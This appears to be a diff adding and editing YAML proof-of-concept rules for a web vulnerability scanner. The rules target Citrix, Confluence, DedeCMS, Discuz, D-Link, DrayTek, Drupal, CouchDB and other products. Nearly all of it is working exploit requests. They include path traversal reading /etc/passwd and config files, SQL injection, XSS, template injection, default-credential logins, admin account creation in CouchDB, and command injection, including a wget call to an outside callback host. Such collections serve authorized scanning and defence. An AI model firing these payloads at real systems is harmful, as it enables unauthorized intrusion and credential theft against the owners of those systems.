+      /plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&map_linkdefaultwidth=7
+    follow_redirects: false
+    expression: response.status == 200
+  - method: GET
+    path: /plugins/weathermap/configs/test.php
+    follow_redirects: false
+    expression: response.status == 200 && response.body.bcontains(b"46ea1712d4b13b55b3f680cc5b8b54e8")
+detail:
+  author: whynot(https://github.com/notwhy)
+  links:
+    - https://www.secpulse.com/archives/47690.html

WebScan/pocs/chinaunicom-modem-default-password.yml

@@ -0,0 +1,9 @@
+name: poc-yaml-chinaunicom-modem-default-password
+rules:
+  - method: POST
+    path: /cu.html
+    body: >-
+      frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=
+    follow_redirects: false
+    expression: |
+      response.status == 302 && response.headers["location"] == "/menu.gch"

WebScan/pocs/citrix-cve-2019-19781-path-traversal.yml

@@ -0,0 +1,11 @@
+name: poc-yaml-citrix-cve-2019-19781-path-traversal
+rules:
+  - method: GET
+    path: /vpn/../vpns/cfg/smb.conf
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"encrypt passwords") && response.body.bcontains(b"name resolve order")
+detail:
+  author: su(https://suzzz112113.github.io/#blog)
+  links:
+    - https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/

WebScan/pocs/citrix-cve-2020-8191-xss.yml

@@ -0,0 +1,18 @@
+name: poc-yaml-citrix-cve-2020-8191-xss
+set:
+  r1: randomLowercase(6)
+rules:
+  - method: POST
+    path: /menu/stapp
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: >-
+      sid=254&pe=1%2C2%2C3%2C4%2C5&appname=%0D%0A%3C%2Ftitle%3E%3Cscript%3Ealert%28{{r1}}%29%3B%3C%2Fscript%3E&au=1&username=nsroot
+    follow_redirects: true
+    expression: response.body.bcontains(bytes("<script>alert(" + r1 + ");</script>")) && response.body.bcontains(b"citrix")
+detail:
+  author: JingLing(https://hackfun.org/)
+  links:
+    - https://support.citrix.com/article/CTX276688
+    - https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/
+    - https://dmaasland.github.io/posts/citrix.html

WebScan/pocs/citrix-cve-2020-8193-unauthorized.yml

@@ -0,0 +1,20 @@
+name: poc-yaml-citrix-cve-2020-8193-unauthorized
+set:
+  user: randomLowercase(8)
+  pass: randomLowercase(8)
+rules:
+  - method: POST
+    path: "/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1"
+    headers:
+      Content-Type: application/xml
+      X-NITRO-USER: '{{user}}'
+      X-NITRO-PASS: '{{pass}}'
+    body: <appfwprofile><login></login></appfwprofile>
+    follow_redirects: false
+    expression: >
+        response.status == 406 && "(?i)SESSID=\\w{32}".bmatches(bytes(response.headers["Set-Cookie"]))
+detail:
+  author: bufsnake(https://github.com/bufsnake)
+  links:
+    - https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner/blob/master/scanner.py
+    - https://blog.unauthorizedaccess.nl/2020/07/07/adventures-in-citrix-security-research.html

WebScan/pocs/citrix-xenmobile-cve-2020-8209.yml

@@ -0,0 +1,11 @@
+name: poc-yaml-citrix-xenmobile-cve-2020-8209
+rules:
+  - method: GET
+    path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body)
+detail:
+  author: B1anda0(https://github.com/B1anda0)
+  links:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8209

WebScan/pocs/coldfusion-cve-2010-2861-lfi.yml

@@ -0,0 +1,13 @@
+name: poc-yaml-coldfusion-cve-2010-2861-lfi
+rules:
+  - method: GET
+    path: >-
+      /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(b"rdspassword=") && response.body.bcontains(b"encrypted=")
+detail:
+  version: 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions
+  author: sharecast
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861

WebScan/pocs/confluence-cve-2015-8399.yml

@@ -0,0 +1,10 @@
+name: poc-yaml-confluence-cve-2015-8399
+rules:
+  - method: GET
+    path: /spaces/viewdefaultdecorator.action?decoratorName
+    follow_redirects: false
+    expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator")
+detail:
+  author: whynot(https://github.com/notwhy)
+  links:
+    - https://www.anquanke.com/vul/id/1150798

WebScan/pocs/confluence-cve-2019-3396-lfi.yml

@@ -0,0 +1,17 @@
+name: poc-yaml-confluence-cve-2019-3396-lfi
+rules:
+  - method: POST
+    path: /rest/tinymce/1/macro/preview
+    headers:
+      Content-Type: "application/json"
+      Host: localhost
+      Referer: http://localhost
+    body: >-
+      {"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}}
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(b"<param-name>contextConfigLocation</param-name>")
+detail:
+  author: sharecast
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396

WebScan/pocs/confluence-cve-2021-26084.yml

@@ -0,0 +1,15 @@
+name: poc-yaml-confluence-cve-2021-26084
+set:
+  r1: randomInt(100000, 999999)
+  r2: randomInt(100000, 999999)
+rules:
+  - method: POST
+    path: /pages/createpage-entervariables.action?SpaceKey=x
+    body: |
+      queryString=\u0027%2b%7b{{r1}}%2B{{r2}}%7d%2b\u0027
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
+detail:
+  author: Loneyer(https://github.com/Loneyers)
+  links:
+    - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

WebScan/pocs/confluence-cve-2021-26085-arbitrary-file-read.yml

@@ -0,0 +1,12 @@
+name: poc-yaml-confluence-cve-2021-26085-arbitrary-file-read
+set:
+    rand: randomLowercase(6)
+rules:
+  - method: GET
+    path: /s/{{rand}}/_/;/WEB-INF/web.xml
+    follow_redirects: false
+    expression: response.status == 200 && response.body.bcontains(b"<display-name>Confluence</display-name>") && response.body.bcontains(b"com.atlassian.confluence.setup.ConfluenceAppConfig")
+detail:
+    author: wulalalaaa(https://github.com/wulalalaaa)
+    links:
+        - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html

WebScan/pocs/consul-rexec-rce.yml

@@ -0,0 +1,10 @@
+name: poc-yaml-consul-rexec-rce
+rules:
+  - method: GET
+    path: /v1/agent/self
+    expression: |
+      response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"DisableRemoteExec\": false")
+detail:
+  author: imlonghao(https://imlonghao.com/)
+  links:
+    - https://www.exploit-db.com/exploits/46073

WebScan/pocs/consul-service-rce.yml

@@ -0,0 +1,10 @@
+name: poc-yaml-consul-service-rce
+rules:
+  - method: GET
+    path: /v1/agent/self
+    expression: |
+      response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"EnableScriptChecks\": true") || response.body.bcontains(b"\"EnableRemoteScriptChecks\": true")
+detail:
+  author: imlonghao(https://imlonghao.com/)
+  links:
+    - https://www.exploit-db.com/exploits/46074

WebScan/pocs/couchcms-cve-2018-7662.yml

@@ -0,0 +1,16 @@
+name: poc-yaml-couchcms-cve-2018-7662
+rules:
+  - method: GET
+    path: /includes/mysql2i/mysql2i.func.php
+    follow_redirects: false
+    expression: >
+      response.status == 200 && response.body.bcontains(b"mysql2i.func.php on line 10") && response.body.bcontains(b"Fatal error: Cannot redeclare mysql_affected_rows() in")
+  - method: GET
+    path: /addons/phpmailer/phpmailer.php
+    follow_redirects: false
+    expression: >
+      response.status == 200 && response.body.bcontains(b"phpmailer.php on line 10") && response.body.bcontains(b"Fatal error: Call to a menber function add_event_listener() on a non-object in")
+detail:
+  author: we1x4n(https://we1x4n.github.io/)
+  links:
+    - https://github.com/CouchCMS/CouchCMS/issues/46

WebScan/pocs/couchdb-cve-2017-12635.yml

@@ -0,0 +1,24 @@
+name: poc-yaml-couchdb-cve-2017-12635
+set:
+  r1: randomLowercase(32)
+rules:
+  - method: PUT
+    path: '/_users/org.couchdb.user:{{r1}}'
+    headers:
+      Content-Type: application/json
+      Content-Length: '192'
+    body: |-
+      {
+        "type": "user",
+        "name": "{{r1}}",
+        "roles": ["_admin"],
+        "roles": [],
+        "password": "fVyuyAECgYEAhgJzkPO1sTV1Dvs5bvls4tyVAsLy2I7wHKWJvJdDUpox2TnCMFT9"
+      }
+    follow_redirects: false
+    expression: |
+      response.status == 201 && response.body.bcontains(bytes("org.couchdb.user:" + r1))
+detail:
+  author: j4ckzh0u(https://github.com/j4ckzh0u)
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635

WebScan/pocs/couchdb-unauth.yml

@@ -0,0 +1,11 @@
+name: poc-yaml-couchdb-unauth
+rules:
+  - method: GET
+    path: /_config
+    follow_redirects: false
+    expression: >
+      response.status == 200 && response.body.bcontains(b"httpd_design_handlers") && response.body.bcontains(b"external_manager") && response.body.bcontains(b"replicator_manager")
+detail:
+  author: FiveAourThe(https://github.com/FiveAourThe)
+  links:
+    - https://www.seebug.org/vuldb/ssvid-91597

WebScan/pocs/craftcms-seomatic-cve-2020-9757-rce.yml

@@ -0,0 +1,20 @@
+name: poc-yaml-craftcms-seomatic-cve-2020-9757-rce
+set:
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
+groups:
+  poc1:
+    - method: GET
+      path: /actions/seomatic/meta-container/meta-link-container/?uri={{{{r1}}*'{{r2}}'}}
+      expression: |
+        response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
+  poc2:
+    - method: GET
+      path: /actions/seomatic/meta-container/all-meta-containers?uri={{{{r1}}*'{{r2}}'}}
+      expression: |
+        response.status == 200 && response.body.bcontains(bytes("MetaLinkContainer")) && response.body.bcontains(bytes("canonical")) && response.body.bcontains(bytes(string(r1 * r2)))
+detail:
+  author: x1n9Qi8
+  links:
+    - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-181
+    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9757

WebScan/pocs/datang-ac-default-password-cnvd-2021-04128.yml

@@ -0,0 +1,14 @@
+name: poc-yaml-datang-ac-default-password-cnvd-2021-04128
+rules:
+  - method: POST
+    path: /login.cgi
+    follow_redirects: false
+    body: >-
+      user=admin&password1=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&password=123456&Submit=%E7%AB%8B%E5%8D%B3%E7%99%BB%E5%BD%95
+    expression: |
+      response.status == 200 && response.headers["set-cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_")
+
+detail:
+  author: B1anda0(https://github.com/B1anda0)
+  links:
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-04128

WebScan/pocs/dedecms-carbuyaction-fileinclude.yml

@@ -0,0 +1,22 @@
+name: poc-yaml-dedecms-carbuyaction-fileinclude
+rules:
+  - method: GET
+    path: /plus/carbuyaction.php?dopost=return&code=../../
+    headers:
+      Cookie: code=alipay
+    follow_redirects: true
+    expression: |
+      response.status == 200
+  - method: GET
+    path: /plus/carbuyaction.php?dopost=return&code=../../
+    headers:
+      Cookie: code=cod
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("Cod::respond()"))
+
+detail:
+  author: harris2015(https://github.com/harris2015)
+  Affected Version: "DedeCmsV5.x"
+  links:
+    - https://www.cnblogs.com/milantgh/p/3615986.html

WebScan/pocs/dedecms-cve-2018-6910.yml

@@ -0,0 +1,10 @@
+name: poc-yaml-dedecms-cve-2018-6910
+rules:
+  - method: GET
+    path: /include/downmix.inc.php
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()"))
+detail:
+  author: PickledFish(https://github.com/PickledFish)
+  links:
+    - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md

WebScan/pocs/dedecms-cve-2018-7700-rce.yml

@@ -0,0 +1,15 @@
+name: poc-yaml-dedecms-cve-2018-7700-rce
+set:
+  r: randomInt(2000000000, 2100000000)
+rules:
+  - method: GET
+    path: >-
+      /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5{{r}};{/dede:field}
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
+detail:
+  author: harris2015(https://github.com/harris2015)
+  Affected Version: "V5.7SP2正式版(2018-01-09)"
+  links:
+    - https://xz.aliyun.com/t/2224

WebScan/pocs/dedecms-guestbook-sqli.yml

@@ -0,0 +1,26 @@
+name: poc-yaml-dedecms-guestbook-sqli
+set:
+  r: randomInt(800000000, 1000000000)
+rules:
+  - method: GET
+    path: /plus/guestbook.php
+    follow_redirects: true
+    expression: |
+      response.status == 200
+    search: action=admin&id=(?P<articleid>\d{1,20})
+  - method: GET
+    path: /plus/guestbook.php?action=admin&job=editok&id={{articleid}}&msg=',msg=@`'`,msg=(selecT md5({{r}})),email='
+    follow_redirects: true
+    expression: |
+      response.status == 200
+  - method: GET
+    path: /plus/guestbook.php
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
+
+detail:
+  author: harris2015(https://github.com/harris2015)
+  Affected Version: "5.7"
+  links:
+    - https://blog.csdn.net/god_7z1/article/details/8180454

WebScan/pocs/dedecms-membergroup-sqli.yml

@@ -0,0 +1,15 @@
+name: poc-yaml-dedecms-membergroup-sqli
+set:
+  r: randomInt(800000000, 1000000000)
+rules:
+  - method: GET
+    path: >-
+      /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{r}})+--+@`'`
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(md5(string(r))))
+detail:
+  author: harris2015(https://github.com/harris2015)
+  Affected Version: "5.6,5.7"
+  links:
+    - http://www.dedeyuan.com/xueyuan/wenti/1244.html

WebScan/pocs/dedecms-url-redirection.yml

@@ -0,0 +1,13 @@
+name: poc-yaml-dedecms-url-redirection
+rules:
+  - method: GET
+    path: >-
+      /plus/download.php?open=1&link=aHR0cHM6Ly93d3cuZHUxeDNyMTIuY29t
+    follow_redirects: false
+    expression: >
+      response.status == 302 && response.headers["location"] == "https://www.du1x3r12.com"
+detail:
+  author: cc_ci(https://github.com/cc8ci)
+  Affected Version: "V5.7 sp1"
+  links:
+    - https://blog.csdn.net/ystyaoshengting/article/details/82734888

WebScan/pocs/discuz-v72-sqli.yml

@@ -0,0 +1,14 @@
+name: poc-yaml-discuz-v72-sqli
+rules:
+  - method: GET
+    path: >-
+      /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
+    follow_redirects: false
+    expression: >
+      response.status == 200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed055") && response.body.bcontains(b"Discuz! info</b>: MySQL Query Error")
+detail:
+  author: leezp
+  Affected Version: "discuz <=v7.2"
+  vuln_url: "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20"
+  links:
+    - https://blog.csdn.net/weixin_40709439/article/details/82780606

WebScan/pocs/discuz-wechat-plugins-unauth.yml

@@ -0,0 +1,11 @@
+name: poc-yaml-discuz-wechat-plugins-unauth
+rules:
+  - method: GET
+    path: '/plugin.php?id=wechat:wechat&ac=wxregister'
+    follow_redirects: false
+    expression: |
+      response.status == 302 && "set-cookie" in response.headers && response.headers["set-cookie"].contains("auth") && "location" in response.headers && response.headers["location"].contains("wsq.discuz.com")
+detail:
+  author: JrD
+  links:
+    - https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI

WebScan/pocs/discuz-wooyun-2010-080723.yml

@@ -0,0 +1,17 @@
+name: poc-yaml-discuz-wooyun-2010-080723
+set:
+  rand: randomInt(200000000, 210000000)
+rules:
+  - method: GET
+    path: >-
+      /viewthread.php?tid=10
+    headers:
+      Cookie: GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D=/.*/eui; GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D=print_r(md5({{rand}}));
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
+detail:
+  version: Discuz 7.x/6.x
+  author: Loneyer
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723

WebScan/pocs/dlink-850l-info-leak.yml

@@ -0,0 +1,17 @@
+name: poc-yaml-dlink-850l-info-leak
+rules:
+  - method: POST
+    path: /hedwig.cgi
+    headers:
+      Content-Type: text/xml
+      Cookie: uid=R8tBjwtFc8
+    body: |-
+      <?xml version="1.0" encoding="utf-8"?><postxml><module><service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service></module></postxml>
+    follow_redirects: false
+    expression: >
+      response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>") && response.body.bcontains(b"<result>OK</result>")
+detail:
+  author: cc_ci(https://github.com/cc8ci)
+  Affected Version: "Dir-850L"
+  links:
+    - https://xz.aliyun.com/t/2941

WebScan/pocs/dlink-cve-2019-16920-rce.yml

@@ -0,0 +1,19 @@
+name: poc-yaml-dlink-cve-2019-16920-rce
+set:
+  reverse: newReverse()
+  reverseURL: reverse.url
+rules:
+  - method: POST
+    path: /apply_sec.cgi
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: >-
+      html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}}
+    follow_redirects: true
+    expression: |
+      response.status == 200 && reverse.wait(5)
+detail:
+  author: JingLing(https://hackfun.org/)
+  links:
+    - https://www.anquanke.com/post/id/187923
+    - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3

WebScan/pocs/dlink-cve-2019-17506.yml

@@ -7,7 +7,7 @@ rules:
     body: SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a
     follow_redirects: false
     expression: >
-      response.status == 200 && response.body.bcontains(b"<name>") && response.body.bcontains(b"<password>")
+      response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"<name>") && response.body.bcontains(b"<password>")
 detail:
   author: l1nk3r,Huasir(https://github.com/dahua966/)
   links:

WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml

@@ -5,8 +5,9 @@ rules:
       /config/getuser?index=0
     follow_redirects: false
     expression: |
-      response.status == 200 && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=") && response.headers["Content-Type"].contains("text/plain")
+      response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=")
+
 detail:
   author: kzaopa(https://github.com/kzaopa)
   links:
-    - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg
+    - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg

WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml

@@ -7,9 +7,9 @@ rules:
     body: >-
       SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
     expression: >
-      response.status == 200 && response.body.bcontains(b"<name>Admin</name>") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>")
+      response.status == 200 && response.content_type.contains("xml") && response.body.bcontains(b"<name>Admin</name>") && response.body.bcontains(b"</usrid>") && response.body.bcontains(b"</password>")
 detail:
   author: x1n9Qi8
   Affected Version: "Dlink DIR-610"
   links:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376

WebScan/pocs/dlink-dcs-info-leak.yml

@@ -1,9 +0,0 @@
-name: poc-yaml-dlink-dcs-info-leak
-rules:
-  - method: GET
-    path: /config/getuser?index=0
-    expression: response.status == 200 && response.body.bcontains(b"name=") && response.body.bcontains(b"pass=") && response.body.bcontains(b"priv=")
-detail:
-  author: jingling(https://github.com/shmilylty)
-  links:
-    - https://mp.weixin.qq.com/s/cG868wc7dmwxFslcwlgDpw

WebScan/pocs/dlink-dsl-2888a-rce.yml

@@ -0,0 +1,25 @@
+name: poc-yaml-dlink-dsl-2888a-rce
+rules:
+  - method: GET
+    path: /page/login/login.html
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(b"var ModelName=\"DSL-2888A\";")
+  - method: POST
+    path: /
+    body: username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    follow_redirects: false
+    expression: |
+      response.status == 302 && response.headers["location"] == "/page/login/login_fail.html"
+  - method: GET
+    path: /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=id
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(b"uid=0(admin) gid=0(admin)")
+detail:
+  author: mvhz81
+  info: dlink-dsl-2888a CVE-2020-24579(Insufficient Authentication) + Hidden Functionality (CVE-2020-24581) = RCE
+  links:
+    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/

WebScan/pocs/docker-api-unauthorized-rce.yml

@@ -4,7 +4,7 @@ rules:
     path: /info
     follow_redirects: false
     expression: |
-      response.status == 200 && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir")
+      response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"KernelVersion") && response.body.bcontains(b"RegistryConfig") && response.body.bcontains(b"DockerRootDir")
 
 detail:
   author: j4ckzh0u(https://github.com/j4ckzh0u)

WebScan/pocs/dotnetcms-sqli.yml

@@ -0,0 +1,21 @@
+name: poc-yaml-dotnetcms-sqli
+set:
+  r1: randomInt(800000000, 1000000000)
+  r2: randomInt(1, 100)
+rules:
+  - method: GET
+    path: /user/City_ajax.aspx
+    follow_redirects: false
+    expression: |
+      response.status == 200
+  - method: GET
+    path: >-
+      /user/City_ajax.aspx?CityId={{r2}}'union%20select%20sys.fn_sqlvarbasetostr(HashBytes('MD5','{{r1}}')),2--
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
+detail:
+  Affected Version: "v1.0~v2.0"
+  links:
+    - https://www.cnblogs.com/rebeyond/p/4951418.html
+    - http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742

WebScan/pocs/draytek-cve-2020-8515.yml

@@ -0,0 +1,15 @@
+name: poc-yaml-draytek-cve-2020-8515
+rules:
+  - method: POST
+    path: /cgi-bin/mainfunction.cgi
+    headers:
+      Content-Type: text/plain; charset=UTF-8
+    body: >-
+      action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a
+    expression: >
+      response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"gid") && "root:[x*]:0:0:".bmatches(response.body)
+detail:
+  author: Soveless(https://github.com/Soveless)
+  Affected Version: "Vigor2960, Vigor300B, Vigor3900 < v1.5.1, VigorSwitch20P2121, VigorSwitch20G1280, VigorSwitch20P1280, VigorSwitch20G2280, VigorSwitch20P2280 <= v2.3.2"
+  links:
+    - https://github.com/imjdl/CVE-2020-8515-PoC

WebScan/pocs/drupal-cve-2018-7600-rce.yml

@@ -2,15 +2,35 @@ name: poc-yaml-drupal-cve-2018-7600-rce
 set:
   r1: randomLowercase(4)
   r2: randomLowercase(4)
-rules:
-  - method: POST
-    path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-    body: |
-      form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
-    expression: |
-      response.body.bcontains(bytes(r1 + "%" + r2))
+groups:
+  drupal8:
+    - method: POST
+      path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
+      headers:
+        Content-Type: application/x-www-form-urlencoded
+      body: |
+        form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
+      expression: |
+        response.body.bcontains(bytes(r1 + "%" + r2))
+  drupal7:
+    - method: POST
+      path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
+      headers:
+        Content-Type: application/x-www-form-urlencoded
+      body: |
+        form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
+      search: |
+        name="form_build_id"\s+value="(?P<build_id>.+?)"
+      expression: |
+        response.status == 200
+    - method: POST
+      path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
+      headers:
+        Content-Type: application/x-www-form-urlencoded
+      body: |
+        form_build_id={{build_id}}
+      expression: |
+        response.body.bcontains(bytes(r1 + "%" + r2))
 detail:
   links:
     - https://github.com/dreadlocked/Drupalgeddon2

WebScan/pocs/drupal-cve-2018-7600-rce2.yml

@@ -1,29 +0,0 @@
-name: poc-yaml-drupal-cve-2018-7600-rce
-set:
-  r1: randomLowercase(4)
-  r2: randomLowercase(4)
-rules:
-  - method: POST
-    path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-    body: |
-      form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
-    search: |
-      name="form_build_id"\s+value="(?P<build_id>.+?)"
-    expression: |
-      response.status == 200
-  - method: POST
-    path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-    body: |
-      form_build_id={{build_id}}
-    expression: |
-      response.body.bcontains(bytes(r1 + "%" + r2))
-detail:
-  links:
-    - https://github.com/dreadlocked/Drupalgeddon2
-    - https://paper.seebug.org/567/
-test:
-  target: http://cve-2018-7600-8-x.vulnet:8080/

WebScan/pocs/drupal-cve-2019-6340.yml

@@ -25,9 +25,9 @@ rules:
       }
     follow_redirects: true
     expression: |
-      response.status == 403 && response.body.bcontains(bytes(r1 + "%" + r2))
+      response.status == 403 && response.content_type.contains("hal+json") && response.body.bcontains(bytes(r1 + "%" + r2))
 detail:
   author: thatqier
   links:
     - https://github.com/jas502n/CVE-2019-6340
-    - https://github.com/knqyf263/CVE-2019-6340
+    - https://github.com/knqyf263/CVE-2019-6340

WebScan/pocs/drupal-drupal7geddon2-rce.yml

@@ -1,28 +0,0 @@
-name: poc-yaml-drupal-drupalgeddon2-rce  # nolint[:namematch]
-set:
-  r1: randomLowercase(4)
-  r2: randomLowercase(4)
-rules:
-  - method: POST
-    path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-    body: |
-      form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
-    search: |
-      name="form_build_id"\s+value="(?P<build_id>.+?)"
-    expression: |
-      response.status == 200
-  - method: POST
-    path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-    body: |
-      form_build_id={{build_id}}
-    expression: |
-      response.body.bcontains(bytes(r1 + "%" + r2))
-detail:
-  drupal_version: 7
-  links:
-    - https://github.com/dreadlocked/Drupalgeddon2
-    - https://paper.seebug.org/567/

WebScan/pocs/drupal-drupal8geddon2-rce.yml

@@ -1,20 +0,0 @@
-name: poc-yaml-drupal-drupalgeddon2-rce  # nolint[:namematch]
-set:
-  r1: randomLowercase(4)
-  r2: randomLowercase(4)
-rules:
-  - method: POST
-    path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-    body: |
-      form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
-    expression: |
-      response.body.bcontains(bytes(r1 + "%" + r2))
-detail:
-  drupal_version: 8
-  links:
-    - https://github.com/dreadlocked/Drupalgeddon2
-    - https://paper.seebug.org/567/
-test:
-  target: http://cve-2018-7600-8-x.vulnet:8080/

WebScan/pocs/dubbo-admin-default-password.yml

